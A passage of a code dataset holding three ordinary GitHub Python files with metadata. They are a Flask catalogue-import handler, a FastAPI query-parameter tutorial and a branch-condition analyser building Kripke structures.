-> bool:\n '''\n Проверка: Дочерние эл-ты могут быть только у CATEGORY\n '''\n parent_id = value_or_none(dict_=item, key_='parentId')\n price = value_or_none(dict_=item, key_='price')\n if not is_category(parent_id):\n info_log.warning(f'POST:/imports родителем может быть только категория')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (parent_id) :\\nitem={item}\\n, 400')\n return False\n if price is not None and price < 0:\n info_log.warning(f'POST:/imports цена должна быть больше 0')\n warning_log.warning(\n f'POST:/imports Проблемы с отдельной структурой item (price) :\\nitem={item}\\n, 400')\n return False\n return True\n\n\ndef value_or_none(dict_: dict, key_: str) -> object:\n if key_ in dict_:\n return dict_[key_]\n return None\n\n\ndef add_child(id_child: str, id_parent: object) -> None:\n '''\n У узла id_parent появился дочерний эл-т id_child\n '''\n parent = ShopUnit.query.filter_by(id=id_parent).first()\n if id_child != id_parent: # проверяем на циклы\n if parent is not None: # если это корень, то пропускаем шаг\n if parent.children is not None:\n parent.children = set(list(parent.children) + [id_child])\n else:\n parent.children = [id_child]\n\n\ndef check_type_context(type: str, price: object) -> bool:\n '''\n Проверка параметров, зависящих от типа\n '''\n if type == 'CATEGORY':\n if price is not None:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n if type == 'OFFER':\n if price is None or price < 0:\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов type={type} price!={price}, 400', )\n return False\n\n return True\n\n\ndef save_statistic(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Фиксируем любое изменение для статистики\n '''\n\n problem = ShopUnitStatistic.query.filter_by(id=node_id).filter_by(date=time_).first()\n if problem is None:\n new_node = ShopUnitStatistic(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n new_node.price = price\n db.session.add(new_node)\n else:\n info_log.info('поле updateDate монотонно возрастает по условию')\n\n\ndef add_node(node_id: str, parentId: object, name: str, type_: str, price: object, time_: datetime) -> None:\n '''\n Функция добавления новой записи по id\n '''\n new_node = ShopUnit(id=node_id, name=name, date=time_, type=type_)\n new_node.parentId = parentId\n add_child(id_child=node_id, id_parent=parentId)\n new_node.price = price\n if type_ == 'CATEGORY':\n new_node.children = []\n db.session.add(new_node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(f'POST:/imports Новый обьект id={node_id}, 200')\n\n\n\n\ndef update_date_parent(node_id: object, time_update: datetime) -> None:\n '''\n Функция обновления даты по id родителя\n '''\n if node_id is None:\n return\n node = ShopUnit.query.filter_by(id=node_id).first()\n if node is not None:\n node.date = time_update\n db.session.add(node)\n save_statistic(node_id=node.id, parentId=node.parentId, name=node.name, type_=node.type, price=node.price,\n time_=time_update)\n update_date_parent(node_id=node.parentId, time_update=time_update)\n\n\ndef save_import_fact(node_id: str, name: str, parentId: object, type: str, price: object) -> None:\n '''\n Фиксируем факт импорта\n '''\n unit_import = ShopUnitImport.query.filter_by(id=node_id).first()\n if unit_import is None:\n unit_import = ShopUnitImport(id=node_id, name=name, type=type)\n unit_import.name = name\n unit_import.parentId = parentId\n unit_import.type = type\n unit_import.price = price\n db.session.add(unit_import)\n\n\ndef save_request_fact(ids: set, update_date: datetime):\n '''\n Фиксируем факт отправки\n '''\n new_import_request = ShopUnitImportRequest()\n new_import_request.items = list(ids)\n new_import_request.updateDate = update_date\n db.session.add(new_import_request)\n\n\ndef update_node(node_id: str, old_parentId: object, parentId: object, name: str, type_: str, price: object,\n time_: datetime) -> None:\n '''\n Обновление значений записи в бд по id\n '''\n node = ShopUnit.query.filter_by(id=node_id).first()\n node.parentId = parentId\n delete_child(id_child=node_id, id_parent=old_parentId) #удаляем ребенка у старого родителя\n add_child(id_child=node_id, id_parent=parentId) #добавляем ребенка новому родителю\n node.name = name\n node.type = type_\n node.price = price\n node.date = time_\n db.session.add(node)\n\n save_import_fact(node_id, name, parentId, type_, price)\n save_statistic(node_id, parentId, name, type_, price, time_)\n\n info_log.info(\n f'POST:/imports Обновление обьекта id={node_id} name={name}, price={price}, date={time_} ch={node.children}, 200')\n\n\n\ndef id_duplicate(ids: set, new_id: str) -> bool:\n '''\n Проверка на наличие дубликатов id.\n ids - множество всех id в текущем запросе\n '''\n if new_id not in ids:\n ids.add(new_id)\n return False\n info_log.warning(\n f'POST:/imports В 1 запросе не может быть дубликатов id={ids} + {new_id}, 400', )\n return True\n\n\ndef main_handler_item(item: dict, update_date: datetime) -> int:\n '''\n Основная функция обработки валидной item и валидной update_date\n '''\n new_parent_id = value_or_none(dict_=item, key_='parentId')\n new_price = value_or_none(dict_=item, key_='price')\n\n node = ShopUnit.query.filter_by(id=item['id']).first()\n type_obj = ShopUnitType.query.filter_by(type=item['type']).first()\n new_type = type_obj.type\n\n if not check_type_context(type_obj.type, new_price):\n return response_error_400()\n\n if node is not None:\n # Если уже есть в базе такой id, значения нужно обновить запись\n if node.type != new_type:\n return 400\n old_parent_id = node.parentId\n update_node(node_id=item['id'], parentId=new_parent_id, name=item['name'],\n type_=new_type, price=new_price, time_=update_date, old_parentId=old_parent_id, )\n if old_parent_id is not None:\n #обновляем старого родителя (время)\n update_date_parent(old_parent_id, time_update=update_date)\n else:\n # иначе создаем новую запись\n add_node(node_id=item['id'], parentId=new_parent_id, name=item['name'], type_=new_type,\n price=new_price, time_=update_date)\n\n if new_parent_id is not None:\n # обновляем нового родителя (время)\n update_date_parent(new_parent_id, time_update=update_date)\n return 200\n\n\n@bp_imports.route('/imports', methods=['POST'])\ndef imports():\n '''\n Обработчик для импортирования новых товаров и/или категорий.\n '''\n\n info_log.info('handler:POST:/imports ')\n if not request.is_json:\n info_log.warning(f'handler:POST:/imports это не json')\n return response_error_400()\n\n data = request.get_json()\n\n if not valid_request_json(data, TIME_FORMAT):\n return response_error_400()\n\n update_date = datetime.datetime.strptime(data['updateDate'], TIME_FORMAT)\n update_date = update_date.isoformat()\n\n ids = set()\n for item in data['items']:\n if (not valid_structure_item(item)) or (not valid_item(item)) or (id_duplicate(ids, item['id'])):\n return response_error_400()\n if main_handler_item(item=item, update_date=update_date) != 200:\n info_log.warning('handler:POST:/imports Нельзя менять типы')\n return response_error_400()\n\n save_request_fact(ids, update_date)\n db.session.commit()\n return '', 200\n", "repo_name": "Alset-Nikolas/RestApiServis", "sub_path": "app/paths/imports.py", "file_name": "imports.py", "file_ext": "py", "file_size_in_byte": 11369, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 14, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 25, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 26, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 34, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 35, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 35, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 43, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 43, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 43, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 57, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 57, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 58, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 58, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 70, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 70, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 71, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 75, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 75, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 76, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 76, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 92, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 92, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 92, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 107, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 107, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 112, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 112, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query.filter_by", "line_number": 124, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query", "line_number": 124, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 124, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 126, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 129, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 129, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 129, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 131, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 131, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 138, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 144, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 144, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 144, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 149, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 149, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 160, "usage_type": "name"}, {"api_name": "db.db.session.add", "line_number": 163, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 163, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 163, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 173, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 175, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 180, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 180, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 180, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImportRequest.ShopUnitImportRequest", "line_number": 187, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 190, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 190, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 190, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 198, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 198, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 198, "usage_type": "name"}, {"api_name": "base_function.delete_child", "line_number": 200, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 206, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 206, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 206, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 211, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 211, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 224, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 224, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 236, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 236, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 236, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query.filter_by", "line_number": 237, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query", "line_number": 237, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType", "line_number": 237, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 241, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 270, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.is_json", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 272, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 272, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 277, "usage_type": "argument"}, {"api_name": "base_function.response_error_400", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 280, "usage_type": "call"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 280, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "base_function.response_error_400", "line_number": 286, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 288, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 288, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 289, "usage_type": "call"}, {"api_name": "db.db.session.commit", "line_number": 292, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 292, "usage_type": "name"}]}
+{"seq_id": "11443707863", "text": "'''\n _oo0oo_\n o8888888o\n 88\" . \"88\n (| -_- |)\n 0\\ = /0\n ___/`---'\\___\n .' \\\\| |// '.\n / \\\\||| : |||// \\\n / _||||| -:- |||||- \\\n | | \\\\\\ - /// | |\n | \\_| ''\\---/'' |_/ |\n \\ .-\\__ '-' ___/-. /\n ___'. .' /--.--\\ `. .'___\n .\"\" '< `.___\\_<|>_/___.' >' \"\".\n | | : `- \\`.;`\\ _ /`;.`/ - ` : | |\n \\ \\ `_. \\_ __\\ /__ _/ .-` / /\n =====`-.____`.___ \\_____/___.-`___.-'=====\n `=---='\n\n\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n 佛祖保佑 永不宕机 永无BUG\n'''\n# -*- coding: utf-8 -*-\n# @Project : FastAPIBook\n# @File Name : 8_query_parameters.py\n# @Author : liushuangdan \n# @Date : 2020/7/17 16:16\n# @IDE : PyCharm\nfrom fastapi import FastAPI\n\n\napp = FastAPI()\nfake_item_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\n@app.get(\"/items\")\nasync def read_item(skip: int = 0, limit: int = 10):\n '''\n @description: \n @param {type} \n @return: \n ''' \n return fake_item_db[skip : skip + limit]\n\n\n@app.get(\"/i/\")\nasync def i(A: str = \"HI...\", B: str = \"Hello, jack\", C: str = \"He..\"):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"ii\")\nasync def ii(A: int = 0, B: int = 10, C: int = 20):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"iii\")\nasync def iii(A: int = 0, B: int = 10, C: int = 20):\n return \"A+B+C\", A+B+C\n\n\n# bool 类型强制转换\n@app.get(\"/xxx/{item_id}\")\nasync def xxx(item_id: str, QQ: str = None, SS: bool = False):\n '''\n @description: \n @param {type}:\n QQ 为 选填参数。\n item_id 为必填参数。\n SS: 为选填参数。 \n @return: \n '''\n item = {\"item_id\": item_id}\n if QQ:\n item.update(\n {\"QQ\": QQ}\n )\n if not SS:\n item.update(\n {\"item_id\": \"This is SSSSSSS(n个s)\"}\n )\n return item\n\n\n# 多路径 和 查询参数 和 必填字段\n@app.get(\"/user/{user_id}/item/{item_id}\")\nasync def read_user_item(\n user_id: int, item_id: str, q: str = None, short: bool = False\n):\n item = {\"item_id\": item_id, \"owner_id\": user_id}\n if q:\n item.update(\n {\"q\": q}\n )\n if not short:\n item.update(\n {\"description\": \"This is an amazing item that has a long description\"}\n )\n return item \n\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n\n", "repo_name": "liushuangdan/FastAPIStudy", "sub_path": "src/FastAPIBook/step2_api/8_query_parameters.py", "file_name": "8_query_parameters.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.FastAPI", "line_number": 35, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "15515001302", "text": "from __future__ import annotations\n\nimport ast\nimport inspect\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import reduce\nfrom typing import Any, Callable, Sequence, cast\n\nfrom .instrumentation import variable_name\nfrom .kripke import Kripke, State\n\n\nclass Comparison(Enum):\n \"\"\"Representation of the comparison operators <=, >=\n\n This class is confined to the operators that include equality because they are the easiest to\n support as STL formulas.\n\n Attributes:\n LTE: less than or equal to operator\n GTE: greater than or equal to operator\n \"\"\"\n\n LTE = auto()\n GTE = auto()\n\n def inverse(self) -> Comparison:\n \"\"\"Invert the comparion.\n\n Returns:\n The inverse comparison operator\n \"\"\"\n\n if self is Comparison.LTE:\n return Comparison.GTE\n\n if self is Comparison.GTE:\n return Comparison.LTE\n\n raise ValueError(f\"Unknown comparison type {self}\")\n\n @staticmethod\n def from_op(node: ast.cmpop) -> Comparison:\n \"\"\"Create a comparison from an AST node.\n\n Args:\n op: The AST comparison operator node\n\n Returns:\n The comparison operator of the node\n\n Raises:\n TypeError: If op is not an AST comparison node\n \"\"\"\n\n if isinstance(node, ast.LtE):\n return Comparison.LTE\n\n if isinstance(node, ast.GtE):\n return Comparison.GTE\n\n raise TypeError(f\"Unsupported comparison operator {node}\")\n\n\nclass InvalidConditionExpression(Exception):\n # pylint: disable=C0115\n pass\n\n\ndef _cmp_nonstrict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left <= right\n\n if cmp is Comparison.GTE:\n return left >= right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\ndef _cmp_strict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left < right\n\n if cmp is Comparison.GTE:\n return left > right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\n@dataclass\nclass Condition:\n \"\"\"Representation of the boolean expression of a conditional statement.\n\n This representation assumes that the condition is represented as an inequality, with a variable\n on at least one side of the equation.\n\n Attributes:\n variable: The name of the variable on the left side of the comparison\n comparison: The comparison operator\n bound: The value or variable on the right side of the comparison\n strict: Whether the inequality is strict (<, >) or nonstrict (<=,>=)\n\n \"\"\"\n\n variable: str\n comparison: Comparison\n bound: str | float\n strict: bool = False\n\n def inverse(self) -> Condition:\n \"\"\"Invert the condition.\n\n If the condition is nonstrict, its inverse will be strict and vice versa. This function\n returns a new Condition instance rather than modifying the existing one.\n\n Returns:\n A new Condition with the comparison inverted\n \"\"\"\n return Condition(self.variable, self.comparison.inverse(), self.bound, not self.strict)\n\n def is_true(self, variables: dict[str, float]) -> bool:\n \"\"\"Check if a condition is true given a set of variables.\n\n If a variable is not present in the map, then the condition is assumed to be false.\n\n Args:\n variables: Mapping from variable names to values\n\n Returns:\n True if the condition is true, False otherwise\n\n Raises:\n ValueError: If the value in the comparison attribute is not the Comparison type\n \"\"\"\n\n try:\n left = variables[self.variable]\n except KeyError:\n return False\n\n try:\n right = variables[self.bound] if isinstance(self.bound, str) else self.bound\n except KeyError:\n return False\n\n if self.strict:\n return _cmp_strict(left, self.comparison, right)\n\n return _cmp_nonstrict(left, self.comparison, right)\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the condition.\"\"\"\n\n if isinstance(self.bound, str):\n return {self.variable, self.bound}\n\n return {self.variable}\n\n @classmethod\n def from_expr(cls, expr: ast.expr) -> Condition:\n \"\"\"Create a Condition from an AST expression node.\n\n This class method assumes that the comparison expression only has a single operand. This is\n not always the case in Python as the expression \"10 <= x <= 20\" is a valid comparison and\n is represented by having several operands in the expression AST node.\n\n Args:\n expr: The AST expression node\n\n Returns:\n A Condition instance representing the AST comparison expression\n\n Raises:\n InvalidConditionExpresssion: If the expr value is not an ast.Compare type\n TypeErrror: If the expression does not conform to the condition assumptions\n \"\"\"\n\n if not isinstance(expr, ast.Compare):\n raise InvalidConditionExpression(f\"Unsupported expression type {type(expr)}\")\n\n left = expr.left\n comparison = Comparison.from_op(expr.ops[0])\n right = expr.comparators[0]\n variable_nodes = (ast.Name, ast.Attribute)\n\n if isinstance(left, variable_nodes) and isinstance(right, variable_nodes + (ast.Constant,)):\n if isinstance(right, variable_nodes):\n return cls(variable_name(left), comparison, variable_name(right))\n\n if isinstance(right, ast.Constant) and isinstance(right.value, (int, float)):\n return cls(variable_name(left), comparison, float(right.value))\n\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n if isinstance(left, ast.Constant) and isinstance(right, variable_nodes):\n if not isinstance(left.value, (int, float)):\n raise TypeError(f\"Invalid bound type {type(right)}\")\n\n return cls(variable_name(right), comparison.inverse(), float(left.value))\n\n raise TypeError(\"Invalid comparison expression\")\n\n @classmethod\n def lt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.LTE, bound, strict)\n\n @classmethod\n def gt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n return cls(variable, Comparison.GTE, bound, strict)\n\n\n@dataclass\nclass BranchTree:\n \"\"\"Representation of a tree of conditional blocks.\n\n A tree represents an independent conditional statement i.e. a single if-else block. This tree\n has two sets of children, one of the conditional statements found in the true block of the\n conditional statement, and one of the conditional statements found in the false block.\n\n Attributes:\n condition: The boolean guard of the conditional block\n true_children: Sub-trees found in the block associated with the condition being true\n false_children: Sub-trees found in the block associated with the condition being false\n \"\"\"\n\n condition: Condition\n true_children: list[BranchTree]\n false_children: list[BranchTree]\n\n def as_kripke(self) -> list[Kripke[Condition]]:\n \"\"\"Convert tree of conditions into a Kripke Structure.\"\"\"\n\n if len(self.true_children) == 0:\n true_kripkes = [Kripke.singleton([self.condition])]\n else:\n true_kripkes = [\n kripke.add_labels([self.condition])\n for child in self.true_children\n for kripke in child.as_kripke()\n ]\n\n inv_cond = self.condition.inverse()\n\n if len(self.false_children) == 0:\n false_kripkes = [Kripke.singleton([inv_cond])]\n else:\n false_kripkes = [\n kripke.add_labels([inv_cond])\n for child in self.false_children\n for kripke in child.as_kripke()\n ]\n\n return [tk.join(fk) for tk in true_kripkes for fk in false_kripkes]\n\n @property\n def variables(self) -> set[str]:\n \"\"\"The set of variables depended on by the tree, including its children.\"\"\"\n\n variables = self.condition.variables\n\n for child in self.true_children:\n variables = variables.union(child.variables)\n\n for child in self.false_children:\n variables = variables.union(child.variables)\n\n return variables\n\n @staticmethod\n def from_function(func: Callable[..., Any]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from an arbitrary python function.\n\n The set of BranchTrees that represent all of the independent conditional statements in the\n function body. In other words, the size of the output set should be the same as the number\n of independent if-else blocks in the function. In order to analyze this function, the\n python source of the function should be available.\n\n Args:\n func: The python function to analyze\n\n Returns:\n A set of BranchTrees representing all independent conditional statements in the function\n\n Raises:\n OsError: If the source code of the function is not available\n \"\"\"\n\n mod_def = ast.parse(inspect.getsource(func))\n func_def = cast(ast.FunctionDef, mod_def.body[0])\n return _block_trees(func_def.body)\n\n\ndef _expr_trees(expr: ast.expr, tcs: list[BranchTree], fcs: list[BranchTree]) -> list[BranchTree]:\n \"\"\"Create a set of BranchTrees from a conditional statement expression.\n\n This function generates a set of trees in order to handle the cases in which the conditional\n statement expression contains either a boolean conjunction or disjunction operator. In the\n case of the conjunction, we traverse the set of operands generating a new tree with the operand\n as the condition and the previous tree as a true child. In the case of disjunction, we traverse\n the set of operands and create a new tree for each operand with the same children for each.\n\n Args:\n expr: The conditional statement expression\n tcs: The set of BranchTrees generated from the true block body\n fcs: The set of BranchTrees generated from the false block body\n\n Returns:\n A set of BranchTrees created from the expression\n\n Raises:\n TypeError: If the condition expression node is not a supported type\n \"\"\"\n # pylint: disable=W0105\n\n if not isinstance(expr, ast.BoolOp):\n condition = Condition.from_expr(expr)\n tree = BranchTree(condition, tcs, fcs)\n return [tree]\n\n if isinstance(expr.op, ast.And):\n \"\"\"In this case, we compose a single tree by iteratively stacking BranchTrees for each\n operand. We explore this approach in the following example.\n\n Given the following condition:\n\n if x <= 5 and y <= 10:\n do_true()\n else:\n do_false()\n\n We can see that this can be re-written as the following:\n\n if x <= 5:\n if y <= 10:\n do_true()\n else:\n do_false()\n else:\n do_false()\n\n The re-written condition can now be analyzed recursively to produce a BranchTree.\n \"\"\"\n\n init = _expr_trees(expr.values[-1], tcs, fcs)\n trees = reduce(lambda ts, e: _expr_trees(e, ts, []), reversed(expr.values[:-1]), init)\n return list(trees)\n\n if isinstance(expr.op, ast.Or):\n \"\"\"In this case, we create a set of trees by iterating over the set of operands and\n creating new trees with the same children. Consider the following example.\n\n Given the following condition:\n\n if x <= 5 or y <= 10:\n do_true()\n else:\n do_false()\n\n This can be re-written as the following:\n\n if x <= 5:\n do_true()\n else:\n do_false()\n\n if y <= 10:\n do_true()\n else:\n do_false()\n\n The re-written condition can now be analyzed into a set of independent BranchTrees.\n \"\"\"\n\n return [tree for e in expr.values for tree in _expr_trees(e, tcs, fcs)]\n\n raise TypeError(f\"Unsupported expression type {type(expr)}\")\n\n\ndef _block_trees(block: Sequence[ast.stmt]) -> list[BranchTree]:\n \"\"\"Create a set of trees from a block of python statements.\n\n Each BranchTree in the set represents an independent conditional statement in the block. The\n true and false blocks of each statement are recursively analyzed to find the child BranchTrees.\n\n Args:\n block: The set of python statements in the block\n\n Returns:\n A set of BranchTrees representing the independent conditional statements in the block\n \"\"\"\n\n block_trees = []\n conditions = [stmt for stmt in block if isinstance(stmt, ast.If)]\n\n for stmt in conditions:\n true_children = _block_trees(stmt.body)\n false_chilren = _block_trees(stmt.orelse)\n\n try:\n stmt_trees = _expr_trees(stmt.test, true_children, false_chilren)\n except InvalidConditionExpression:\n pass\n else:\n block_trees.extend(stmt_trees)\n\n return block_trees\n\n\ndef active_branches(kripke: Kripke[Condition], variables: dict[str, float]) -> list[State]:\n \"\"\"Compute branches that are active given a set of variables.\n\n Args:\n kripke: The kripke structure containing states representing conditional branches\n variables: The set of variable values the state labels depend on\n\n Returns:\n The list of states that are active given the set of variables.\n \"\"\"\n\n def is_active(state: State) -> bool:\n return all(label.is_true(variables) for label in kripke.labels_for(state))\n\n return [state for state in kripke.states if is_active(state)]\n\n\n__all__ = [\"BranchTree\", \"Comparison\", \"Condition\", \"active_branches\"]\n", "repo_name": "cpslab-asu/branch-statement-analyzer", "sub_path": "src/bsa/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 14114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 25, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 26, "usage_type": "call"}, {"api_name": "ast.cmpop", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ast.LtE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "ast.GtE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "ast.expr", "line_number": 162, "usage_type": "attribute"}, {"api_name": "ast.Compare", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Constant", "line_number": 188, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 190, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 192, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 193, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 197, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 201, "usage_type": "call"}, {"api_name": 